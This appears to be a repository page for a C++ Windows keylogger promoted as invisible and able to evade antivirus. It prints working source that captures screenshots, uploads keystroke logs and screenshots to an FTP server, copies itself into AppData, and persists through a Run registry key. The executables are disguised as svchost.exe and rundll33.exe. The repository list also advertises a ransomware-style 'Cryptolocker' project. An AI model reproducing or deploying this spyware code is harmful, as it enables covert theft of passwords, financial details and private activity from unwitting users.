• Stars
    star
    630
  • Rank 71,328 (Top 2 %)
  • Language
    C++
  • Created over 6 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Keylogger is 100% invisible keylogger not only for users, but also undetectable by antivirus software. Blackcat keylogger Monitors all keystokes, Mouse clicks. It has a seperate process which continues capture system screenshot and send to ftp server in given time.

DISCLAIMER : OUR TOOLS ARE FOR EDUCATIONAL PURPOSES ONLY. DON'T USE THEM FOR ILLEGAL ACTIVITIES. YOU ARE THE ONLY RESPONSABLE FOR YOUR ACTIONS! OUR TOOLS ARE OPEN SOURCE WITH NO WARRANTY AND AS ARE.

πš…πš’πšœπš’πšπš˜πš›πšœ Please Don't Forgot to Hit ⭐

Keylogger

Keylogger is 100% invisible keylogger not only for users. Keylogger Monitors all keystokes, Mouse clicks. It has a seperate process which continues capture system screenshot and send to ftp server in given time.

Keylogger designed in visual C++ and it is run in the background in stealth mode(Hidden Window).

A Keylogger (short for keystroke logger) is software that tracks or logs the keys struck on your keyboard, 
typically in a covertmannerso that you don’t know that your actions are being monitored. 
This is usually done with malicious intent to collect your account information, credit card numbers,
user names, passwords, and other private data.

FEATURES OF BLACKCAT KEYLOGGER

  • Discrete/Tamper Proof :By design, Advance Keylogger is undetectable and thus cannot be tampered with or removed by kids/employees .

  • Keystrokes Typed: See every keystroke typed even if it is deleted. This keystroke logger feature provides a reader-friendly version of all keystrokes logged along with the raw keylogging activity so you can see every detail.

  • Continuous Screenshots: Video-style playback of screenshots for programs and websites selected by you. For example, watch an email as it's being typed and edited instead of just seeing the finished product (1,000 screenshots included with purchase).

  • FTP Server: Screenshot and keylogger Logfile which contain senstive user information send to ftp server (Mobile/Web/System). Powerful ftp server also write in Core Visual C++.

  • AutoStart : Keylogger has functionaility to auto execute on system bootup. It Insert entry on system startup program when it is running.

  • AutoCopy : Keylogger has functionaility to auto copy in %appdata%/roaming/wpdnse/ folder.

Keylogger.Zip Contain two Executable Files. (Sourcecode File Also Included)

  1. svchost.exe (Main Keylogger Processs)
  2. rundll33.exe (Capture Screenshot & send all Log and Screenshot to FTP Server (ftp://192.168.8.2:2121))

Execute both files once time next time its automatically start and capture screenshot and keylog.

These names Given for unrecognisable in Task Manager.

How to Use ?

  1. Start FTP Server on This Ip Address 192.168.8.2:2121
  2. and Start both program and Enjoy!!!!

Undectable keylogger (60+ Antivirus Bypass)

ScreenShot

Visual C++ Source Code

Capture Screenshot

void screenshot(string file){
	ULONG_PTR gdiplustoken;
	GdiplusStartupInput gdistartupinput;
	GdiplusStartupOutput gdistartupoutput;

	gdistartupinput.SuppressBackgroundThread = true;
	GdiplusStartup(& gdiplustoken,& gdistartupinput,& gdistartupoutput); //start GDI+

	HDC dc=GetDC(GetDesktopWindow());//get desktop content
	HDC dc2 = CreateCompatibleDC(dc);	 //copy context

	RECT rc0kno;

	GetClientRect(GetDesktopWindow(),&rc0kno);// get desktop size;
	int w = rc0kno.right-rc0kno.left;//width
	int h = rc0kno.bottom-rc0kno.top;//height

	HBITMAP hbitmap = CreateCompatibleBitmap(dc,w,h);//create bitmap
	HBITMAP holdbitmap = (HBITMAP) SelectObject(dc2,hbitmap);

	BitBlt(dc2, 0, 0, w, h, dc, 0, 0, SRCCOPY);//copy pixel from pulpit to bitmap
	Bitmap* bm= new Bitmap(hbitmap,NULL);

	UINT num;
	UINT size;

	ImageCodecInfo *imagecodecinfo;
	GetImageEncodersSize(&num,&size); //get count of codec

	imagecodecinfo = (ImageCodecInfo*)(malloc(size));
	GetImageEncoders (num,size,imagecodecinfo);//get codec

	CLSID clsidEncoder;

	for(int i=0; i < num; i++)
	{
		if(wcscmp(imagecodecinfo[i].MimeType,L"image/jpeg")==0)
			clsidEncoder = imagecodecinfo[i].Clsid;//get jpeg codec id

	}

	free(imagecodecinfo);

	wstring ws;
	ws.assign(file.begin(),file.end());//sring to wstring
	bm->Save(ws.c_str(),& clsidEncoder); //save in jpeg format
	SelectObject(dc2,holdbitmap);//Release Objects
	DeleteObject(dc2);
	DeleteObject(hbitmap);

	ReleaseDC(GetDesktopWindow(),dc);
	GdiplusShutdown(gdiplustoken);

}

Send Screenshot to Server Via FTP

void ftp_scrshot_send(){

	HINTERNET hInternet;
	HINTERNET hFtpSession;

	DWORD rec_timeout = 5000;

	hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
		if(hInternet == NULL){
			log_error_file<<"Error:"<<GetLastError();
		}
		else{
			hFtpSession = InternetConnect(hInternet,"192.168.8.2",2121,NULL,NULL,INTERNET_SERVICE_FTP,0,0);
			InternetSetOption(hInternet,INTERNET_OPTION_SEND_TIMEOUT,&rec_timeout,sizeof(rec_timeout));
			if(hFtpSession == NULL){

				log_error_file<<"Error:"<<GetLastError();
			}
			else{
				if(!FtpPutFile(hFtpSession,"core32.mni","hacks/sc/dc.jpg",FTP_TRANSFER_TYPE_BINARY,0)){
					log_error_file<<"Error:"<<GetLastError();
				}
			}	
		}

	log_error_file.close();
}

Send KeyLog Data to FTP Server

void ftplogsend(){


	HINTERNET hInternet;
	HINTERNET hFtpSession;

	DWORD rec_timeout = 2000;

	hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);

		if(hInternet == NULL){
			log_error_file<<"Error:"<<GetLastError();
		}
		else{
			hFtpSession = InternetConnect(hInternet,"192.168.8.2",2121,NULL,NULL,INTERNET_SERVICE_FTP,0,0);
			InternetSetOption(hInternet,INTERNET_OPTION_SEND_TIMEOUT,&rec_timeout,sizeof(rec_timeout));


			if(hFtpSession == NULL){

				log_error_file<<"Error:"<<GetLastError();
			}
			else{
				if(!FtpPutFile(hFtpSession,"atapi.sys","hacks/hacks.txt",FTP_TRANSFER_TYPE_BINARY,0)){
					log_error_file<<"Error:"<<GetLastError();
					log_error_file.close();
				}
			}


		}
	}

Auto Copy in AppData Folder & Intialize Keylog Text File with Date Time Stamp

void AutoCopy(){

	string f_path = userlc;
	string f_name=f_path;
	f_name+="\\svchost.exe";//file name
	char my_name[260];
	GetModuleFileName(GetModuleHandle(0),my_name,260);//name of running process
	string f_my=my_name;
	CreateDirectory(f_path.c_str(),NULL);
	CopyFile(f_my.c_str(),f_name.c_str(),FALSE);

}

void Install(){

	SYSTEMTIME st;
	GetLocalTime(&st);
	int year = st.wYear;
	int month = st.wMonth;
	int day = st.wDay;
	int hour = st.wHour;
	int mintue = st.wMinute;

	string yearS =  to_string(year);
	yearS += "_";
	string monthS =  to_string(month);
	monthS += "-";
	string dayS =  to_string(day);
	dayS += "-";
	string hourS =  to_string(hour);
	hourS += "H-";
	string mintueS =  to_string(mintue);
	mintueS += "M------------>\n\n";

	string startDate = "\n\n";
	startDate += dayS + monthS + yearS + hourS + mintueS;
	char dateCh[260];
	strcpy(dateCh,startDate.c_str());


	string ff_path = userlc;
	char szDir[260];
	strcpy(szDir,ff_path.c_str());
	strcat(szDir,"atapi.sys");
	FILE *file;
	file = fopen(szDir, "a+");

	fputs(dateCh,file);
	fclose(file);

}

AutoStart on System Bootup

void AutoStart()
{
	char Driver[MAX_PATH];
	HKEY hKey;
	string ff_path = userlc + "svchost.exe";
	strcpy(Driver,ff_path.c_str());
	RegOpenKeyExA(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey);
	RegSetValueExA(hKey, "Windows Atapi x86_64 Driver", 0, REG_SZ, (const unsigned char *)Driver, MAX_PATH);
	RegCloseKey(hKey);
}

Happy Cyber Security

Happy Open Source......

More Repositories

1

User-Management-PHP-MYSQL

PHP User Management System is a powerful PHP script that offers a secure user management system. The application is a great way to build your website, allowing your users to register an account and build restricted access to certain users. We offer great support and it’s very easy to install. It’s powered by MYSQL and PHP.
JavaScript
187
star
2

Cryptolocker

CryptoLocker is open source files encrypt-er. Crypto is developed in Visual C++. It has features encrypt all file, lock down the system and send keys back to the server. Multi-threaded functionality helps to this tool make encryption faster.
124
star
3

Indian-States-Cities-Database

Cities.js is JavaScript library to create Indian State & City dropdown lists containing all the States names and Cities names. It is easy customization library.
HTML
63
star
4

PyQt-Sqlite-Project-CURD

Pyqt SQLite Project Have Features like Login, Add, Delete, Search, Update, Show the Students. In this, I show all the CURD operations of the Program. All Project is well represented and with interactive Toolbar & Menu bar. The database is included in the repository.
Python
50
star
5

Hidden-Screen-Capture

It is primary designed to be hidden and monitoring the computer activity. Take a screenshot of desktop in hidden mode using Visual C++ and save automatically to 'jpeg' file in every 30 second. 60+ Most Popular antivirus not detect this application while it is running on background.
45
star
6

Grocery-CMS-PHP-Restful-API

Grocery-CMS-PHP-Restful-API is an online grocery shop. The project is developed by using PHP/MySQL/Slim Restful API. The project has powerful backend cms to manage grocery shop online. it has features like add items, remove items, update price, manage orders etc. Restful API ready to embed in Application using JSON data.
PHP
44
star
7

Youtube-Video-Downloader

Youtube Downloader is GUI tool to download YouTube video. It is Developed with Python, Qt, and Pytube Library. It is Multi-thread Application. Best Available Option download video in highly available Quality . Download Videos in 720p, 480p, 360p, etc.
Python
25
star
8

Angry-Birds-Unity

The game features a 2 level, 3 birds for the user to throw, 3 birds that the user has to destroy, parallax backgrounds, a maximum strength for the bird (we cannot drag the bird more than a predefined distance), The user’s ability to drag the screen to see the entire scene, pinch to zoom ability (for multi touch devices) and a small trail that is left by the bird when it’s thrown. Sound is Included .
C#
12
star
9

Visual-Basic-Scripts

Visual Basic Scripts Utilities. Fun, Automation, Fundamentals. With the help of these scripts, I develop lots of Exploits which I'm used for automation system tasks. these vb scripts I am also used for system security exploitation.
Visual Basic
11
star
10

BloodCenter-App-Ionic3-Angular4-Php-Restful-API

The blood bank is an Open Source mobile application Developed in Ionic 3, Angular 4, Php & Slim Restful API. It’s a NON PROFIT activity purely done to serve and fulfill one task of tackling maximum emergency situations with minimum infrastructure involved. The backend is designed in Php to manage all app functionality.
TypeScript
11
star
11

Socket-Programming-C

A socket is the mechanism that most popular operating systems provide to give programs access to the network. It allows messages to be sent and received between applications (unrelated processes) on different networked machines.
C
11
star
12

Basic-Bootstrap-Php-Ecommerce

Basic HTML, BOOTSTRAP, PHP Ecommerce Site. Just Basic Functionality with login, register, product listing, cart management, checkout. It comes with MySql database.
PHP
9
star
13

College-Assignment-App

Developing Android/iOS App For Amritsar College of Engineering & Technology for online College Notes, Assignments etc. It is Hybrid App Develop with help of Html 5, CSS, PHP, MySQL, Ionic, Angular, REST API etc.
TypeScript
8
star
14

Resume-Portfolio-Laravel

Laravel Resume website with basic routing, views, controller, database handling, form validation & form submission etc.
JavaScript
8
star
15

Laravel-Todo

A Laravel todo application that can help to manage your task easily and remind you about tasks. Application cover complete CURD operation like create a task, view task, update task and delete a task. Application developed with Laravel functionality like routing, controller model etc
7
star
16

Grocery-App-Documentation

Grocery App an online grocery shop CMS. Grocery smart grocery shopping List is a free app that improves the quality of your grocery shopping by making it easier, faster, and most importantly smarter. It is all you would want out of a shopping list and more. Cross-Platform Android & iOS Ionic 3 App has great UI. Grocery App has a Secure Token-Based SHA 256 Authentication. The project backend is developed by using PHP/MySQL/Slim Restful API. The project has powerful backend cms to manage grocery shop online. it has features like add items, remove items, update price, manage orders, manage banners, manage users etc.
7
star
17

Feedback-Management-System

Digital feedback management system. we will provide a link to students with their class id and password, and boom within a few minutes the whole class or say the whole college can submit their feedback and share their problems.
JavaScript
7
star
18

Academe-Online-Course-Sellling-App

Academe is a App for online learning & Course Selling. Here students and teachers are combined together for sharing knowledge through a structured course based system. Teachers or instructors can create unlimited number of courses, upload videos and documents according to their expertise and students can enroll to these courses and make themselves skilled anytime and from anywhere.
7
star
19

Ionic3-Network-Dictionary-App

Network Dictionary App built in Ionic3 and Angular4. In this app 5000+ network terms, words are added and its search function searches content using angular providers from JSON file. the app has lots of another information page which provides some tech information.
JavaScript
6
star
20

Blogger

Blogger is a powerful PHP script to manage blog & news. Blogger has a clean and minimal design that can make a great user experience. Blogger Script Design in PHP Slim Framework and Mysql. Author has better control to manage posts, category, section, pages, etc. Powerful CMS dashboard control every section on front end blog Design & Logic.
6
star
21

The-Fury-Road

This is a 2D Game developed in UNITY (Gaming Engine). The main idea behind the game is that you have to drive as long as you can on a road which has no end and has lots of difficulties. There are mountains (Big & Small) in your way which does not allow you to drive smoothly and creates the problem of going out of fuel. Another difficulty includes mines. Mines are placed in your way and when your car hits the mine it will be thrown into the air and you have to balance the car and make stunts and land it safely. Your car will be crashed if its upper part, bumper or step bumper or trunk lids hits the ground. You have to reach as far as you can before going out of fuel. Also you are provided with boost in your way. The amount of boost is pre-fixed. Taking the boost is the only way to cover a long distance. You are also provided with fuel tanks in your way. Another important part in the game is collection of coins while playing.
C#
6
star
22

Image-Puzzle-Game

Image Puzzle is Game For I Designed College Technical Event. It Is Designed With HTML, CSS, Javascript, Jquery. Image Complete with Mouse drag Functionalities . It Has Also Step Count and Time Count Functionalities.You Can Also Switch to Difficulty Mode.
HTML
6
star
23

Ionic3-Php-Rest-API-Address-Book

Ionic3 Php Rest API Address Book is developed in Ionic3 Angular4 & Php Slim Restful API with MySql Database. It is based on Ionic CRUD Operation. Addressbook has functionality like register user, login user, add a contact with mobile number, address, and google map integration with longitude and latitude parameter. The address book has also functionality to checking already registered user. The Address Book has Great UI/ UX. It has Token Based Restful Authentication.
JavaScript
6
star
24

Responsive-WebPage

Web-page which is developed in HTML, CSS, Bootstrap, JQuery, OwlCarousel etc. It is developed for Practice.
CSS
5
star
25

Ionic-Youtube-Video

In this app show, youtube videos embedded in Ionic 3 Application. Application show two methods (iframes, Object) to implement embded videos. DomSanitizer is also implemented for safe Url and Cross-site Scripting (XSS).
CSS
5
star
26

Hospitalization-Charges-Application-Assignment

This program computes and displays various components of hospitalization cost based on the level of hospital stay, duration of stay, and costs associated with diagnostic tests, lab tests, medication and rehab, if any. You will be prompted to enter several inputs.
C#
5
star
27

Minimal-Landing-Page

Minimal Blog landing page which is designed in HTML, CSS, JavaScript, jQuery, Bootstrap.
CSS
4
star
28

Webpage-Brightster

Web-page which is developed in HTML and CSS. It is developed for Practice.
HTML
4
star
29

Webpage-Maximus

Web-page which is developed in HTML and CSS. It is developed for Practice.
CSS
4
star
30

Telephone-Billing-System-C-Plus-Plus-QT

Telephone Billing System is developed In C++ QT. It has Little Functionality Which shows Complete CURD Operation. SQLite Database Integration is Included in this project. It Has functionality like Login, Add Customer, delete a customer, Update customer, Generate bill With the help of Graphical user interface.
4
star
31

Ionic-Cart-System

Ionic cart system is a program which shows how we create cart management system using Ionic3. In this, we show different functionality like add products to cart, increment, and decrement product quantity, delete the product from the cart, show item count in cart. In this tutorial, we using static function & static cart list to perform all this operation.
JavaScript
4
star
32

Event-Management-System-Python

Python
3
star
33

Emo-Unity-Game

Emo Unity game based on basic Arcade/Adventure. Game developed in Unity Game Engine 5.2 Ver. The game has functionality like coin collect, side scrolling, the enemy, obstacles, jumping etc. Adobe Photoshop is used to design some asset.
ASP
3
star
34

Ionic-ENB

TypeScript
2
star
35

Laravel-Practice

Re-code To fresh up Laravel framework!
PHP
2
star
36

Webpage-Philosophy

Web-page which is developed in HTML and CSS. It is developed for Practice.
HTML
2
star
37

Printer-Sharing

PrinterShare is a versatile and user-friendly application that simplifies printer sharing over both web servers and local networks. Whether you need to print documents at the office or from the comfort of your home.
C#
2
star
38

Covid-Tracer-App

1
star
39

Todo-React-Native-Expo

Note Taking app to help you stay organized and manage your day-to-day.
JavaScript
1
star
40

Practicle-Guide-Slim-Framework-3

Practical guide Slim3 framework. In these tutorials, we cover up all basic of a slim framework like Routing, Controller, Middleware, API etc. we also Cover Basic form handling, page navigation, database connectivity, and complete CURD operation.
PHP
1
star
41

Course-Mangement-System

Learning Management System Project In PHP is a project created using PHP programming language that can be used in a classroom based setup. Wherein, the instructor can only upload the module or topic to the system and the student can only interact with the system and follow the instructions in the module set by the instructors.
PHP
1
star